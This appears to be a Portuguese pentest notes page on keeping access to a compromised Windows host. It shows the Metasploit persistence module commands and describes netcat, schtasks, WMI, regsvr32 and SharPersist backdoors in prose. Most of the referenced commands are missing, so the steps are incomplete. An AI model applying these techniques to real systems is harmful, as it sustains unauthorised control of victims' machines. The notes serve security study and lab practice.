Persistência
As vezes podemos perder nossa conexão depois que o host alvo reiniciar ou ficar um tempo sem conexão com a internet. Veremos aqui algumas formas de deixar nossa conexão com a vítima de forma permanente.
Metasploit
Nos exemplo abaixo, estamos utilizando um alvo Windows, no qual já temos uma sessão aberta com o Meterpreter.
IMPORTANTE: Para todos os exemplos abaixo, utilize o exploit/multi/handler para pegar o Meterpreter após o host alvo reiniciar o SO.
IMPORTANTE: Certifique-se de ser NT AUTHORITY\SYSTEM e ter feito um migrate em processos como lsass.exe ou explorer.exe, para assim obter melhores resultados.
Persistence
Antes de prosseguir, utilize o migrate para garantir o acesso.
ps -S lsass.exe
migrate <pid>Agora, execute os comandos para deixar o acesso de fato persistente.
use exploit/windows/local/persistence
set EXE_NAME win32
set REG_NAME win32
set VBS_NAME win32
set PATH c:\\windows\\system32
set STARTUP SYSTEM
set LPORT <port>
set SESSION <session_id>
exploitPersistence Registry
Persistence Service
RDP
Depois de pegar o Meterpreter, utilize o comando abaixo para criar um user com acesso RDP.
Netcat
Faça o upload do binário do netcat para o alvo. No Kali podemos encontrá-lo, então vamos realizar o upload utilizando o Meterpreter.
Agora vamos manipular o registro do Windows para fazer com que o netcat realize a conexão conosco assim que o SO for inicializado.
Para conferir se o comando deu certo, execute:
Agora podemos conectar no host remoto através do comando abaixo, mesmo depois de reiniciar o SO.
Schtasks
Para seguir os passos abaixo, é preciso ter acesso ao Meterpreter. Note que estamos utilizando o EventID 4634, pois estamos criando uma tarefa agendada com base no ID do Evento. A identificação do evento é listada nos logs quando uma conta foi desconectada. Portanto, uma vez que um usuário se logue novamente, devemos conseguir uma sessão no Meterpreter.
No host atacante, utilize o exploit/multi/handler para realizar a conexão via Meterpreter.
wmic
Faça upload do arquivo arquivo gerado para o alvo em C:\Users\Administrator\AppData\Local\Temp.
Execute os comandos wmic no SO alvo para criar a persistência.
No host atacante, utilize o exploit/multi/handler para realizar a conexão via Meterpreter.
WMI
Execute o comando abaixo em outro terminal para gerar o backdoor e envie o arquivo gerado para o host alvo.
Feito isso, acesse o diretório onde está o arquivo WMI-Persistence.ps1 e abra uma porta web.
Agora vá para o terminal que está com o Meterpreter aberto (ou utilize o mesmo terminal e acesse o Meterpreter) e execute os seguintes comandos:
O host então, poderá ser reiniciado que irá tentar conectar com o host atacante, realizando assim uma conexão via Meterpreter. No host alvo, utilize o exploit/multi/handler para realizar a conexão via Meterpreter.
Regsvr32
Vá para o outro terminal (que tenha acesso Meterpreter) e execute os seguintes comandos:
Após isso, será realizar uma conexão Meterpreter assim que o host alvo for reiniciado.
SharPersist
Faça upload dos arquivos SharPersist.exe e backdoor.exe para o host alvo no diretório C:\Users\Administrator\AppData\Local\Temp\ e depois execute no Meterpreter:
No host atacante, utilize o exploit/multi/handler para realizar a conexão via Meterpreter.
Sites
Last updated
Was this helpful?